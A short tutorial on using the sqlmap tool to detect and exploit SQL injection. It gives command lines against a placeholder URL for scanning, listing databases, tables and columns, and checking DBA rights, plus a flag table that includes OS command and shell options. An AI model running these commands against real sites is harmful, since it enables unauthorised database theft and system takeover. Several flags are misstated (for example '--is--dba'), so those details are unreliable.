SQL Injection with sqlmap

The sqlmap is an open source tool built in Python, which allows the detection and exploitation of SQL injection attacks. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM Db2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix databases. In this tutorial, I will cover how to use sqlmap to test and exploit SQL injection.

How To Use sqlmap

1. First, we take a look at the help menu in sqlmap to better understand some of the features it offers. This can be done using the following command.

sqlmap -h 

2. To scan a URL for SQL vulnerability we can use the following command

sqlmap -u  "http://website.com/something.php?something=1"

3. Once a SQL has been detected, we can choose yes (y) to skip all other types of payloads

4. Once SQL has been detected, we can list the databases name using the --dbs flag like the command below.

sqlmap -u "http://website.com/something.php?something=1" --dbs

5. Now that we know how to get the database we can use the --tables and --column flag to get table and column names by using the following command.

sqlmap -u "http://website.com/something.php?something=1" --tables --column

6. To check whether the user is a database administrator, we can use the --is-dba flag

sqlmap -u "http://website.com/something.php?something=1" --is--dba

7. The sqlmap command has a lot of flags. We can use the following table to see the different types of flags and what they do.

Flag	Description
--tables	Dumps all table names
-T	Specifies a table name to perform an operation on
--os-cmd	Execute an operating system command
--os-shell	Prompts a command shell to the system
-r	Specifies a filename to run the SQL test on
--tamper	Users a tamper script
--eta	Show estimated time remaining to dump data
--dbs=MYSql, MSSQL, Oracle	We can manually choose a database and perform injection for specific database types only.
--proxy	Specifies a proxy